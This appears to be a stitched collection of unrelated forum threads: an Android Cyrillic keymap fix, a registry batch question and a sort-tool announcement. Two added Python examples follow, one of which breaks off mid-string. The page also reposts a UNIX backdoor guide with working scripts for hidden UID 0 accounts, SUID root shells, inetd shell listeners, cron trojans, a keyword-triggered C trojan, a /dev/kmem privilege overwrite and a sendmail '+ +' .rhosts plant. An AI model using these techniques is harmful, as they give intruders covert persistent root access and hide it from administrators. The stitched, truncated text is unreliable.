Hello there.
According to this description:
http://www.kandroid.org/android_pdk/keymaps_keyboard_input.html
I am trying to create a new layout with Cyrillic characters (so I want to kind of introduce localization for input).
In order to do this I am changing some lines in file
./development/emulator/keymaps/qwerty.kcm
from:
Code:
[type=QWERTY]
# keycode display number base caps fn caps_fn
A 'A' '2' 'a' 'A' '#' 0x00
B 'B' '2' 'b' 'B' '<' 0x00
.....
to
Code:
[type=QWERTY]
# keycode display number base caps fn caps_fn
A 'A' '2' 'a' 'A' '#' 0x00
B 'Б' '2' 'б' 'Б' '<' 0x00
.....
which are supposed to be russian characters.
But compiling this yields:
Code:
KeyCharMap: out/target/product/generic/obj/KEYCHARS/qwerty.kcm_intermediates/qwerty.kcm.bin
development/emulator/keymaps/qwerty.kcm:5: expected number or quoted ascii but got: 'а'
So it seems like it does not like UTF-8 characters. So, how am I supposed to create a non-ASCII layout?
You need to use UTF8 chars in quotation marks = "Б", try it again and pls post a file if you succeeded
the same stuff:
Code:
[[email protected] bin]$ make
build/core/product_config.mk:229: WARNING: adding test OTA key
build/core/main.mk:177: implicitly installing apns-conf_sdk.xml
============================================
TARGET_PRODUCT=generic
TARGET_SIMULATOR=
TARGET_BUILD_TYPE=release
TARGET_ARCH=arm
TARGET_OS=linux
HOST_ARCH=x86
HOST_OS=linux
HOST_BUILD_TYPE=release
BUILD_ID=TC3
============================================
KeyCharMap: out/target/product/generic/obj/KEYCHARS/qwerty.kcm_intermediates/qwerty.kcm.bin
development/emulator/keymaps/qwerty.kcm:6: expected number or quoted ascii but got: "Б"
make: *** [out/target/product/generic/obj/KEYCHARS/qwerty.kcm_intermediates/qwerty.kcm.bin] Error 1
[[email protected] bin]$ cat development/emulator/keymaps/qwerty.kcm
[type=QWERTY]
# keycode display number base caps fn caps_fn
A 'A' '2' 'a' 'A' '#' 0x00
B "Б" '2' "б" "Б" '<' 0x00
......
You might try the numeric value for the characters instead. I'm not sure if that would work or not. I don't have much experience with non-US character sets
So, this is the file which performs the checking:
./build/tools/kcm/kcm.cpp:
the piece of code is:
Code:
static int
parse_number(const char* filename, int lineno, char* str, int* value)
{
    int len = strlen(str);
    if (len == 3 && str[0] == '\'' && str[2] == '\'') {
        if (str[1] > 0 && str[1] < 127) {
            *value = (int)str[1];
            return 0;
        } else {
            fprintf(stderr, "%s:%d: only low ascii characters are allowed in"
                    " quotes near: %s\n", filename, lineno, str);
            return 1;
        }
    }
    char* endptr;
    *value = strtol(str, &endptr, 0);
    if (*endptr != '\0') {
        fprintf(stderr, "%s:%d: expected number or quoted ascii but got: %s\n",
                filename, lineno, str);
        return 1;
    }
    if (*value >= 0xfffe || *value < 0) {
        fprintf(stderr, "%s:%d: unicode char out of range (no negatives, "
                "nothing larger than 0xfffe): %s\n", filename, lineno, str);
        return 1;
    }
    return 0;
}
Anyone can say, how the charset should be formatted in order to pass this?
Ок, I found out.
Just change 'a' to 0xNNNN (with no quotes around).
I've tested the Cyrillic layout with the emulator -- it works fine.
Does anybody with root access want to try it on G1?
I'll provide you with layout file and instructions.
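The fix described in this post (replace each quoted non-ASCII character with its numeric code point) can be applied to a whole .kcm file mechanically. The following is an added example, not part of the original thread or of the Android build tools: the function names are hypothetical, the sample rows are the ones quoted above, and kcm_accepts() mirrors only the checks visible in the parse_number() excerpt.

```python
import re

MAX_KCM_VALUE = 0xFFFE  # parse_number() rejects any value >= 0xfffe

# One character between matching single or double quotes.
_QUOTED = re.compile(r"""^(['"])(.)\1$""", re.DOTALL)
# What strtol(str, &endptr, 0) consumes completely: hex, octal or decimal.
_NUMBER = re.compile(r"^[+-]?(?:0[xX][0-9a-fA-F]+|0[0-7]*|[1-9][0-9]*)$")


def strtol_base0(token):
    """Return the integer strtol(..., 0) would yield, or None on trailing junk."""
    if not _NUMBER.match(token):
        return None
    sign = -1 if token.startswith("-") else 1
    digits = token.lstrip("+-").lower()
    if digits.startswith("0x"):
        return sign * int(digits[2:], 16)
    if len(digits) > 1 and digits.startswith("0"):
        return sign * int(digits, 8)
    return sign * int(digits, 10)


def kcm_accepts(token):
    """Mirror the two branches of the parse_number() excerpt."""
    raw = token.encode("utf-8")
    # Branch 1: exactly three BYTES, single quotes around one low-ASCII byte.
    # 'Б' is four bytes in UTF-8, so it never reaches this branch.
    if len(raw) == 3 and raw[0] == 0x27 and raw[2] == 0x27:
        return 0 < raw[1] < 127
    # Branch 2: the whole token must be a number in [0, 0xfffe).
    value = strtol_base0(token)
    return value is not None and 0 <= value < MAX_KCM_VALUE


def to_numeric(token):
    """Rewrite a quoted character the tool would reject as 0xNNNN."""
    match = _QUOTED.match(token)
    if match is None or kcm_accepts(token):
        return token
    codepoint = ord(match.group(2))
    if codepoint >= MAX_KCM_VALUE:
        raise ValueError("U+%04X is outside the range kcm allows" % codepoint)
    return "0x%04x" % codepoint


def convert_line(line):
    """Convert one .kcm row; headers, comments and blank lines pass through."""
    stripped = line.strip()
    if not stripped or stripped.startswith("#") or stripped.startswith("["):
        return line
    return re.sub(r"\S+", lambda m: to_numeric(m.group(0)), line)


def convert_kcm(text):
    return "\n".join(convert_line(line) for line in text.splitlines())


# Rows quoted in the thread above, used here as sample input.
SAMPLE = """[type=QWERTY]
# keycode display number base caps fn caps_fn
A 'A' '2' 'a' 'A' '#' 0x00
B 'Б' '2' 'б' 'Б' '<' 0x00"""

if __name__ == "__main__":
    print(convert_kcm(SAMPLE))
```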
I am really interested in trying this! Have rooted G1.
I've already tried, it works!
Now I am trying to understand how to write a simple utility which will copy files back and forth in order to change layout.
http://forum.xda-developers.com/showthread.php?t=466705
please help - i wanna do this for hebrew chars
can u give me a quick run through of what you did to get this done and a more detailed explanation on how you overcame the unicode char failing in the file?
plus - if i understand correctly - you do not have english anymore on your keyboard - or is there something that allows you to switch between languages somehow (an android alt-shift or whatever?)
thanks,
E.
--
Peace
eladkatz said:
can u give me a quick run through of what you did to get this done and a more detailed explanation on how you overcame the unicode char failing in the file?
plus - if i understand correctly - you do not have english anymore on your keyboard - or is there something that allows you to switch between languages somehow (an android alt-shift or whatever?)
thanks,
E.
--
Peace
attached is the example of file with unicode chars
the only way to changes layouts i can see -- is to copy layout files back and forth
So, it actually does work, I wrote a simple app which changes key layout files as soon as you launch it. It is kind of a software layout switcher.
Main problem now: Android seems to have some buffer, so the layout does not change as soon as you replace a file. It takes some random time or chars to input before the changes apply.
So I am wondering if somebody knows how to force Android to reload the charmap?
Another thing that might help: if I can find out which process opens the charmap file, it could really help. Unfortunately neither Android nor busybox has an lsof command.
more info:
I have noticed that the app reloads the layout file at the same time as the garbage collector runs for this app. I don't know for sure whether GC initiates layout reloading or they are both initiated by some superior event.
I keep digging through the Android sources; if anyone has any ideas I'll be glad to consider 'em.
keep us posted
dude, what you are doing is very interesting, and i'd appreciate it if you could keep updating.
Thanks,
E.
i have a adp1, but i can´t put the file on my g1?
can someone please tell me how to do, or why don´t i have root acess?
thanks
eladkatz said:
dude, what you are doing is very interesting, and i'd appreciate it if you could keep updating.
Thanks,
E.
2nd that! Appreciate your work, Worry. Thanx!
Can this be done for Bulgarian layout? I am searching something like this for a long time...
worry said:
I wrote a simple app which changes key layout files as soon as you launch it.
Have you figured out how to access android filesystem from the Java app?
hello!file attached above was only src,need to be makekcharmap-ed,yes?can u plz put here compiled version because at this time don't have an ability 2 use computer and sdk to compile myself!thanks!!!
I have a question :
How to mod the input method ?
For an example : with input method, when I type double "A" it will become "Â", and it will back to "A" if I type triple "A".
(We use a qwerty keyboard and an input method controller to type our language, we don't have our own keyboard like Russian, Japanese ...)
Really good job! Thanks!
Please, keep updating!
Hey guys,
I'm trying to create a batch script for deploying pda's and I need to disable the hardware buttons on a Pharos. Here's what i've found:
In a command line, you can use the command
Code:
REG DELETE \\HKLM\Software\microsoft\shell\keys\ /va /f
But i'm thinking this command deletes the LOCAL key on the computer, and I obviously need it to delete it on the PDA.
I've used this example:
Code:
REG DELETE KeyName [/v ValueName | /ve | /va] [/f]
KeyName [\\Machine\]FullKey
Machine Name of remote machine - omitting defaults to the current machine
Only HKLM and HKU are available on remote machines
FullKey ROOTKEY\SubKey
ROOTKEY [ HKLM | HKCU | HKCR | HKU | HKCC ]
SubKey The full name of a registry key under the selected ROOTKEY
ValueName The value name, under the selected Key, to delete
When omitted, all subkeys and values under the Key are deleted
/ve delete the value of empty value name <no name>
/va delete all values under this key
/f Forces the deletion without propmt
Examples:
REG DELETE HKLM\Software\MyCo\MyApp\Timeout
Deletes the registry key Timeout and its all subkeys and values
Anyone have a clue?
i would read up on doing it with morth scripts on the pda
I don't think that's an option, since I have 500+ devices to configure... I'll look into it, but i'm hoping someone could help me out with my first script.
/me = stupid.
I should've thought of this earlier: i can make a cabfile and then push it to the device with the batch script.
Problem solved.
eXtended Sort/Merge for Android
Hello all !
I suppose a very few of you have ever needed to sort a file on your Android phone ...
Eventually, you can use the standard Unix 'busybox sort' program in a Terminal Emulator instance :
sort -k 1.1,1.10 -o myOutFile.txt myInFile.txt
This will sort the input file, ordering lines from the first ten characters of each line, ascending.
Applied to a 50 MB file (500,000 lines of 100 bytes each), it takes about 50 sec. on my Galaxy Note.
So, I did a port of a mainframe-like sort/merge, along with a Gui, that does the same job in 5 to 7 sec.
For those interested in testing this application (see attachments), remarks, ideas [and bugs ...] are welcome in this thread.
The attachment contains :
hxsm : the binary program
xsmgui-v.vv.apk : the Gui application
50mt.txt : a 50 MB text file, given as an example above
Installation (adb ...) :
download and unzip the attached file,
push or copy 50mt.txt to /sdcard/tmp (or any other directory you can access)
push or copy hxsm to /data/local/bin (or any other directory in the standard PATH)
make it executable : shell chmod 777 /data/local/bin/hxsm
install the Gui : xsmgui-v.vv.apk
Check you have to read/write/execute on all directories involved (chmod 777 ...)
SnapShots and further explanations on next post.
And run Xsm carefully, first using the default parameters shown by the Gui:
in all cases, I will not be responsible for any failure/damage on your phone.
Please post if possible :
Brand and model of your Android box
Android version (Gingerbread, ICS ...)
Cpu speed
Size of files(s) sorted
Duration of the job(s)
Furthermore, if you have room on your sdcard(s), you can get a larger sample text file, by copying the basic sample (50mt.txt) several times on itself, and sort it :
on my G.N., a 1 GB file (ten millions lines of 100 bytes each) is sorted in 180 sec.
Still, enjoy !
Advanced Use
Those wanting more may directly invoke the hxsm command in a terminal emulator
For help, just enter 'hxsm' at the command prompt :
usage :
hxsm -c, --check -q|-v, --quiet|--verbose -h, --help
-m, --merge |--copy[|--sort]
-k, --key=all | start,len[,order(A|D),[format(B|C|I|P|Z|Y)] ]
-r, --recfm=F|V|M
-z|-l, --lrecl=nnnn
-i, --infile=in_id1[,recfm=x[,lrecl=nnn] --infile=in_id2....
-o, --outfile=out_id[,recfm=x[,lrecl=nnn]]
--outrec=(in_pos1,len1,out_pos1,type1[in_pos2,...])
-f, --field-separator=TAB|BAR|COMMA|COLUMN|SEMICOLUMN|c|0Xhh
-uk|-ur, --unique-key|--unique-record
--include=start,len,op,val[AND|OR,start,len,op,val...]
--exclude=start,len,op,val[AND|OR,start,len,op,val...]
-t --sortwork=dir1,dir2,.. --sortwork=dir3,dir4,..
-y, --storage=nnnK|M|G
--keep-order
-f --field-separator=TAB|COMMA|COLUMN|SEMICOLUMN|c|0Xhh
--record-separator=c|0xhh
--collating-sequence=ascii|ebcdic
--skip-head=nnn
--throw-empty-records
-E --ignore-ioerror [ = ignore short lines ]
--norun
Example for the job given as an example in post #1 :
hxsm --verbose --recfm=V --lrecl=250 --key=1,10 --input=/sdcard/tmp/50mt.txt --output=/sdcard/tmp/6=50mt-sorted.txt
or
hxsm -v -rV -l250 -k 1,10 -i/sdcard/tmp/50mt.txt -o/sdcard/tmp/6=50mt-sorted.txt
Explanation for some useful options
-k : sort/merge keys
You may specify several keys
For each key, specify the start column (byte number starting at 1), the key length in bytes, and eventually the letter 'D' for descending order.
Furthermore, for each key, you may also have 'specific' field formats, most inherited from IBM mainframes, like 'Packed' or 'Zoned' decimal fields, or just 'Numeric'.
example :
hxsm ... -k 14,3,D,P --key=1,10,A,Z -k35,40 ... --recfm=F --lrecl=100
This will sort the file on a global key including:
a packed, signed decimal field (5 digits + sign), descending order
a zoned, signed, decimal field (10 digits, including sign)
an alphanumeric field (40 bytes).
Note that in that case, the file cannot be a text file, because of a possible x'0D' inside the packed field : it should be specified as 'Binary Fixed' (--recfm=F)
-i : input file
you can have several input files, provided that the sort keys are at the same place in all files
example :
hxsm ... -i file1 --infile=file2 -ifile3 ...
--skip-head=nnn : throws the nnn first lines/records
-m : merge several input files already sorted on the same key
example :
hxsm -m -o resulting_file -i file1 --infile=file2 -ifile3 ...
-t : sort-work directories
It may improve performance, provided you have more than 1 sdcard (a fast one, class 10), or a fast usb stick connected
If this is the case, just specify a working directory on the corresponding mount point :
example :
hxsm ... -t /mnt/sdcard/external_sd/tmp (and check you've done a chmod 777 on it ...)
Input/Output
if the -i option is omitted, then the program will read from stdin
if the -o option is omitted, then the program will write onto stdout
Filtering
You may filter the lines or records you want to be written onto the output :
-uk : unique key
if several lines/records have the same key, then only one will be written
-ur : unique record
if several lines/records are strictly identical, then only one will be written
--include=start,len,op,val ...
--exclude=start,len,op,val ...
takes in, or omits, lines/records whose field(s) match some criteria
Examples:
hxsm ... --include=12,3,EQ,C'ABC' ...
this will keep only records where there is 'ABC' in cols. 12-14
hxsm ... --include=12,3,EQ,C'ABC',OR,12,13,EQ,c'ABD' ...
this will keep only records where there is 'ABC' or 'ABD' in cols. 12-14
hxsm ... --exclude=15,1,EQ,C'Z' --include=12,3,EQ,XC'ABC' ...
this will throw all records having a 'Z' in col. 15,
then, in the records left, keep only those having 'ABC' in cols 12-14
Sorting 'CSV-like' files
If the input file(s) has no fixed keys location, but rather varying length fields,
then the fields are "SOMETHING SEPARATED" (i.e. column, semi-column, tabulation ...)
In this case, just specify the 'SOMETHING' with the -f (--field-separator=...) option.
The program will consider that all lines are made of fields separated by 'SOMETHING',
and that each length given in the '--key=' option is a MAXIMUM length.
For 'SOMETHING', you may specify :
--field-separator=TAB (0x09) or BAR (0x7C) or COLUMN (0x3A) or SEMI[-]COLUMN (0x3B)
or any hexadecimal value 0x00 .. 0XFF
Example :
hxsm ... -f TAB -k 3,5,D --key=1,10,A -k 5,40 -k2,9,A,N ...
This will sort the file on a global key including:
an alphanumeric key in field #3, max length 5 chars, descending order
an alphanumeric key in field #1, max length 10 chars
an alphanumeric key in field #5, max length 40 chars
a numeric key in field #2, max length 9 digits
All fields being separated by a TAB char (0x09).
Snapshots
All snapshots are in the following attachment
(if anybody can tell me how to put the snapshots 'online' ...)
Thanks, not for the mass but useful tool though.
hhenault said:
All snapshots are in the following attachment
(if anybody can tell me how to put the snapshots 'online' ...)
Edit post -> Go Advanced -> Manage Attachments -> in the popup window add your pictures instead of the zip file, you can upload picts too.
I thought this was an interesting paper written by an unknown author
You've been at it for all night. Trying all the exploits you can think of. The system seems tight. The system looks tight.
The system *is* tight. You've tried everything. Default passwds, guessable passwds, NIS weaknesses, NFS holes, incorrect
permissions, race conditions, SUID exploits, Sendmail bugs, and so on... Nothing.
After seeming endless you've managed to steal root. Now what? How do you hold onto this precious super-user
privilege you have worked so hard to achieve....?
This list is BY NO MEANS comprehensive. There are as many ways to leave backdoors into a UNIX computer as there are
ways into one.
Beforehand
Know the location of critical system files. This should be obvious (If you can't list any off the top of your head, stop reading
now, get a book on UNIX, read it, then come back to me...). Familiarity with passwd file formats (including general 7 field
format, system specific naming conventions, shadowing mechanisms, etc...). Know vi. Many systems will not have those
robust, user-friendly editors such as Pico and Emacs. Vi is also quite useful for needing to quickly search and edit a large file. If
you are connecting remotely (via dial-up/telnet/rlogin/whatever) it's always nice to have a robust terminal program that has a
nice, FAT scrollback buffer. This will come in handy if you want to cut and paste code, rc files, shell scripts, etc...
The permanence of these backdoors will depend completely on the technical savvy of the administrator. The experienced and
skilled administrator will be wise to many (if not all) of these backdoors. But, if you have managed to steal root, it is likely the
admin isn't as skilled (or up to date on bug reports) as she should be, and many of these doors may be in place for some time
to come. One major thing to be aware of, is the fact that if you can cover your tracks during the initial break-in, no one will be
looking for back doors.
The JDevil Overt
[1] Add a UID 0 account to the passwd file. This is probably the most obvious and quickly discovered method of reentry. It
flies a red flag to the admin, saying "WE'RE UNDER ATTACK!!!". If you must do this, my advice is DO NOT simply
prepend or append it. Anyone casually examining the passwd file will see this. So, why not stick it in the middle...
#!/bin/csh
# Inserts a UID 0 account into the middle of the passwd file.
# There is likely a way to do this in 1/2 a line of AWK or SED. Oh well.
# [email protected]
set linecount = `wc -l /etc/passwd`
cd # Do this at home.
cp /etc/passwd ./temppass # Safety first.
echo passwd file has $linecount[1] lines.
@ linecount[1] /= 2
@ linecount[1] += 1 # we only want 2 temp files
echo Creating two files, $linecount[1] lines each \(or approximately that\).
split -$linecount[1] ./temppass # passwd string optional
echo "jdevil::0:0:jdevil:/home/sweet/home:/bin/csh" >> ./xaa
cat ./xab >> ./xaa
mv ./xaa /etc/passwd
chmod 644 /etc/passwd # or whatever it was beforehand
rm ./xa* ./temppass
echo Done...
NEVER, EVER, change the root password. The reasons are obvious.
[2] In a similar vein, enable a disabled account as UID 0, such as Sync. Or, perhaps, an account somewhere buried deep in the
passwd file has been abandoned, and disabled by the sysadmin. Change her UID to 0 (and remove the '*' from the second
field).
[3] Leave an SUID root shell in /tmp.
#!/bin/sh
# Everyone's favorite...
cp /bin/csh /tmp/.JDEVIL # Don't name it that...
chmod 4755 /tmp/.JDEVIL
Many systems run cron jobs to clean /tmp nightly. Most systems clean /tmp upon a reboot. Many systems have /tmp mounted
to disallow SUID programs from executing. You can change all of these, but if the filesystem starts filling up, people may
notice...but, hey, this *is* the overt section....). I will not detail the changes necessary because they can be quite system
specific. Check out /var/spool/cron/crontabs/root and /etc/fstab.
The JDEVIL Veiled
[4] The super-server configuration file is not the first place a sysadmin will look, so why not put one there? First, some
background info: The Internet daemon (/etc/inetd) listens for connection requests on TCP and UDP ports and spawns the
appropriate program (usually a server) when a connection request arrives. The format of the /etc/inetd.conf file is simple. Typical
lines look like this:
(1) (2) (3) (4) (5) (6) (7)
ftp stream tcp nowait root /usr/etc/ftpd ftpd
talk dgram udp wait root /usr/etc/ntalkd ntalkd
Field (1) is the daemon name that should appear in /etc/services. This tells inetd what to look for in /etc/services to determine
which port it should associate the program name with. (2) tells inetd which type of socket connection the daemon will expect.
TCP uses streams, and UDP uses datagrams. Field (3) is the protocol field which is either of the two transport protocols, TCP
or UDP. Field (4) specifies whether or not the daemon is iterative or concurrent. A 'wait' flag indicates that the server will
process a connection and make all subsequent connections wait. 'Nowait' means the server will accept a connection, spawn a
child process to handle the connection, and then go back to sleep, waiting for further connections. Field (5) is the user (or more
importantly, the UID) that the daemon is run as. (6) is the program to run when a connection arrives, and (7) is the actual
command (and optional arguments). If the program is trivial (usually requiring no user interaction) inetd may handle it internally.
This is done with an 'internal' flag in fields (6) and (7).
So, to install a handy backdoor, choose a service that is not used often, and replace the daemon that would normally handle it
with something else. A program that creates an SUID root shell, a program that adds a root account for you in the /etc/passwd
file, etc...
For the insinuation-impaired, try this:
Open the /etc/inetd.conf in an available editor. Find the line that reads:
daytime stream tcp nowait root internal
and change it to:
daytime stream tcp nowait /bin/sh sh -i.
You now need to restart /etc/inetd so it will reread the config file. It is up to you how you want to do this. You can kill and
restart the process, (kill -9 , /usr/sbin/inetd or /usr/etc/inetd) which will interrupt ALL network connections (so it is a good idea
to do this off peak hours).
[5] An option to compromising a well known service would be to install a new one, that runs a program of your choice. One
simple solution is to set up a shell that runs similar to the above backdoor. You need to make sure the entry appears in
/etc/services as well as in /etc/inetd.conf. The format of the /etc/services file is simple:
(1) (2)/(3) (4)
smtp 25/tcp mail
Field (1) is the service, field (2) is the port number, (3) is the protocol type the service expects, and (4) is the common name
associated with the service. For instance, add this line to /etc/services:
jdevil 22/tcp jdevil
and this line to /etc/inetd.conf:
jdevil stream tcp nowait /bin/sh sh -i
Restart inetd as before.
Note: Potentially, these are VERY powerful backdoors. They not only offer local reentry from any account on the system,
they offer reentry from *any* account on *any* computer on the Internet.
[6] Cron-based trojan I. Cron is a wonderful system administration tool. It is also a wonderful tool for backdoors, since root's
crontab will, well, run as root... Again, depending on the level of experience of the sysadmin (and the implementation), this
backdoor may or may not last. /var/spool/cron/crontabs/root is where root's list for crontabs is usually located. Here, you have
several options. I will list only a few, as cron-based backdoors are only limited by your imagination. Cron is the clock daemon.
It is a tool for automatically executing commands at specified dates and times. Crontab is the command used to add, remove,
or view your crontab entries. It is just as easy to manually edit the /var/spool/crontab/root file as it is to use crontab. A crontab
entry has six fields:
(1) (2) (3) (4) (5) (6)
0 0 * * 1 /usr/bin/updatedb
Fields (1)-(5) are as follows: minute (0-59), hour (0-23), day of the month (1-31) month of the year (1-12), day of the week
(0-6). Field (6) is the command (or shell script) to execute. The above shell script is executed on Mondays. To exploit cron,
simply add an entry into /var/spool/crontab/root. For example: You can have a cronjob that will run daily and look in the
/etc/passwd file for the UID 0 account we previously added, and add him if he is missing, or do nothing otherwise (it may not
be a bad idea to actually *insert* this shell code into an already installed crontab entry shell script, to further obfuscate your
shady intentions). Add this line to /var/spool/crontab/root:
0 0 * * * /usr/bin/trojancode
This is the shell script:
#!/bin/csh
# Is our jdevil still on the system? Let's make sure he is.
#[email protected]
set JDEVILflag = (`grep jdevil /etc/passwd`)
if($#JDEVILflag == 0) then # Is he there?
set linecount = `wc -l /etc/passwd`
cd # Do this at home.
cp /etc/passwd ./temppass # Safety first.
@ linecount[1] /= 2
@ linecount[1] += 1 # we only want 2 temp files
split -$linecount[1] ./temppass # passwd string optional
echo "jdevil::0:0:Mr. Sinister:/home/sweet/home:/bin/csh" >> ./xaa
cat ./xab >> ./xaa
mv ./xaa /etc/passwd
chmod 644 /etc/passwd # or whatever it was beforehand
rm ./xa* ./temppass
echo Done...
else
endif
[7] Cron-based trojan II. This one was brought to my attention by our very own Mr. Zippy. For this, you need a copy of the
/etc/passwd file hidden somewhere. In this hidden passwd file (call it /var/spool/mail/.sneaky) we have but one entry, a root
account with a passwd of your choosing. We run a cronjob that will, every morning at 2:30am (or every other morning), save a
copy of the real /etc/passwd file, and install this trojan one as the real /etc/passwd file for one minute (synchronize swatches!).
Any normal user or process trying to login or access the /etc/passwd file would get an error, but one minute later, everything
would be ok. Add this line to root's crontab file:
29 2 * * * /bin/usr/_passwd
make sure this exists:
#echo "root:1234567890123:0:0perator:/:/bin/csh" > /var/spool/mail/.passwd
and this is the simple shell script:
#!/bin/csh
# Install trojan /etc/passwd file for one minute
#[email protected]
cp /etc/passwd /etc/.temppass
cp /var/spool/mail/passwd /etc/passwd
sleep 60
mv /etc/.temppass /etc/passwd
[8] Compiled code trojan. Simple idea. Instead of a shell script, have some nice C code to obfuscate the effects. Here it is.
Make sure it runs as root. Name it something innocuous. Hide it well.
/* A little trojan to create an SUID root shell, if the proper argument is
given. C code, rather than shell to hide obvious it's effects. */
/* [email protected] */
#include
#define KEYWORD "industry3"
#define BUFFERSIZE 10
int main(argc, argv)
int argc;
char *argv[];{
int i=0;
if(argv[1]){ /* we've got an argument, is it the keyword? */
if(!(strcmp(KEYWORD,argv[1]))){
/* This is the trojan part. */
system("cp /bin/csh /bin/.swp121");
system("chown root /bin/.swp121");
system("chmod 4755 /bin/.swp121");
}
}
/* Put your possibly system specific trojan
messages here */
/* Let's look like we're doing something... */
printf("Sychronizing bitmap image records.");
/* system("ls -alR / >& /dev/null > /dev/null&"); */
for(;i<10;i++){
fprintf(stderr,".");
sleep(1);
}
printf("\nDone.\n");
return(0);
} /* End main */
[9] The sendmail aliases file. The sendmail aliases file allows for mail sent to a particular username to either expand to several
users, or perhaps pipe the output to a program. Most well known of these is the uudecode alias trojan. Simply add the line:
"decode: "|/usr/bin/uudecode"
to the /etc/aliases file. Usually, you would then create a uuencoded .rhosts file with the full pathname embedded.
#! /bin/csh
# Create our .rhosts file. Note this will output to stdout.
echo "+ +" > tmpfile
/usr/bin/uuencode tmpfile /root/.rhosts
Next telnet to the desired site, port 25. Simply fakemail to decode and use as the subject body, the uuencoded version of the
.rhosts file. For a one liner (not faked, however) do this:
%echo "+ +" | /usr/bin/uuencode /root/.rhosts | mail [email protected]
You can be as creative as you wish in this case. You can setup an alias that, when mailed to, will run a program of your
choosing. Many of the previous scripts and methods can be employed here.
The JDEVIL Covert
[10] Trojan code in common programs. This is a rather sneaky method that is really only detectable by programs such as tripwire.
The idea is simple: insert trojan code in the source of a commonly used program. Some of the most useful programs to us in this
case are su, login and passwd because they already run SUID root, and need no permission modification. Below are some
general examples of what you would want to do, after obtaining the correct sourcecode for the particular flavor of UNIX you
are backdooring. (Note: This may not always be possible, as some UNIX vendors are not so generous with their sourcecode.)
Since the code is very lengthy and different for many flavors, I will just include basic pseudo-code:
get input;
if input is special hardcoded flag, spawn evil trojan;
else if input is valid, continue;
else quit with error;
...
Not complex or difficult. Trojans of this nature can be done in less than 10 lines of additional code.
The JDEVIL Esoteric
[11] /dev/kmem exploit. It represents the virtual of the system. Since the kernel keeps its parameters in memory, it is possible
to modify the memory of the machine to change the UID of your processes. To do so requires that /dev/kmem have read/write
permission. The following steps are executed: Open the /dev/kmem device, seek to your page in memory, overwrite the UID of
your current process, then spawn a csh, which will inherit this UID. The following program does just that.
/* If /kmem is is readable and writable, this program will change the user's
UID and GID to 0. */
/* This code originally appeared in "UNIX security: A practical tutorial"
with some modifications by [email protected] */
#include
#include
#include
#include
#include
#include
#include
#define KEYWORD "nomenclature1"
struct user userpage;
long address(), userlocation;
int main(argc, argv, envp)
int argc;
char *argv[], *envp[];{
int count, fd;
long where, lseek();
if(argv[1]){ /* we've got an argument, is it the keyword? */
if(!(strcmp(KEYWORD,argv[1]))){
fd=(open("/dev/kmem",O_RDWR);
if(fd<0){
printf("Cannot read or write to /dev/kmem\n");
perror(argv);
exit(10);
}
userlocation=address();
where=(lseek(fd,userlocation,0);
if(where!=userlocation){
printf("Cannot seek to user page\n");
perror(argv);
exit(20);
}
count=read(fd,&userpage,sizeof(struct user));
if(count!=sizeof(struct user)){
printf("Cannot read user page\n");
perror(argv);
exit(30);
}
printf("Current UID: %d\n",userpage.u_ruid);
printf("Current GID: %d\n",userpage.g_ruid);
userpage.u_ruid=0;
userpage.u_rgid=0;
where=lseek(fd,userlocation,0);
if(where!=userlocation){
printf("Cannot seek to user page\n");
perror(argv);
exit(40);
}
write(fd,&userpage,((char *)&(userpage.u_procp))-((char *)&userpage));
execle("/bin/csh","/bin/csh","-i",(char *)0, envp);
}
}
} /* End main */
#include
#include
#include
#define LNULL ((LDFILE *)0)
long address(){
LDFILE *object;
SYMENT symbol;
long idx=0;
object=ldopen("/unix",LNULL);
if(!object){
fprintf(stderr,"Cannot open /unix.\n");
exit(50);
}
for(;ldtbread(object,idx,&symbol)==SUCCESS;idx++){
if(!strcmp("_u",ldgetname(object,&symbol))){
fprintf(stdout,"User page is at 0x%8.8x\n",symbol.n_value);
ldclose(object);
return(symbol.n_value);
}
}
fprintf(stderr,"Cannot read symbol table in /unix.\n");
exit(60);
}
[12] Since the previous code requires /dev/kmem to be world accessible, and this is not likely a natural event, we need to take
care of this. My advice is to write a shell script similar to the one in [7] that will change the permissions on /dev/kmem for a
discrete amount of time (say 5 minutes) and then restore the original permissions. You can add this source to the source in [7]:
chmod 666 /dev/kmem
sleep 300 # Nap for 5 minutes
chmod 600 /dev/kmem # Or whatever it was before
JDevil
Happy Reading
There are some small spacing errors in the code, but you get the idea
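From the defender's side, the artifacts that items [1] to [5] of the paper leave behind (an extra UID 0 or passwordless passwd entry, a set-UID file in a scratch directory, an inetd.conf entry that starts a shell) can be checked mechanically. The following is an added example, not part of the original post or paper: the function names are hypothetical, the sample file contents are constructed, and the jdevil lines are the entries quoted in the paper.

```python
import os
import stat

SHELLS = {"sh", "csh", "tcsh", "ksh", "bash", "zsh"}


def audit_passwd(text):
    """Return (line number, issue) pairs for passwd-format text."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((lineno, "malformed entry (expected 7 fields)"))
            continue
        name, password, uid = fields[0], fields[1], fields[2].strip()
        # Items [1] and [2]: any account besides root that maps to UID 0.
        if uid.isdigit() and int(uid) == 0 and name != "root":
            findings.append((lineno, "UID 0 account other than root: " + name))
        # An empty second field means the account needs no password at all.
        if password == "":
            findings.append((lineno, "empty password field: " + name))
    return findings


def audit_inetd(text):
    """Return (line number, issue) pairs for inetd.conf-format text."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        fields = line.split("#", 1)[0].split()
        if not fields:
            continue
        if len(fields) < 6:
            findings.append((lineno, "short entry: " + fields[0]))
            continue
        # Items [4] and [5]: a shell in the user, server or argument fields.
        # The entries in the paper omit the user field, so the shell path
        # can sit in field 5 as well as field 6.
        if any(os.path.basename(f) in SHELLS for f in fields[4:]):
            findings.append((lineno, "service starts a shell: " + fields[0]))
    return findings


def find_setuid(root):
    """Item [3]: list (path, owner uid) of set-UID regular files under root."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # file vanished or is unreadable; skip it
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append((path, st.st_uid))
    return sorted(hits)


# Constructed sample input; the jdevil lines are the ones shown in the paper.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/bin/false
jdevil::0:0:jdevil:/home/sweet/home:/bin/csh
alice:x:1001:1001:Alice:/home/alice:/bin/sh
"""

SAMPLE_INETD = """# constructed inetd.conf
ftp stream tcp nowait root /usr/etc/ftpd ftpd
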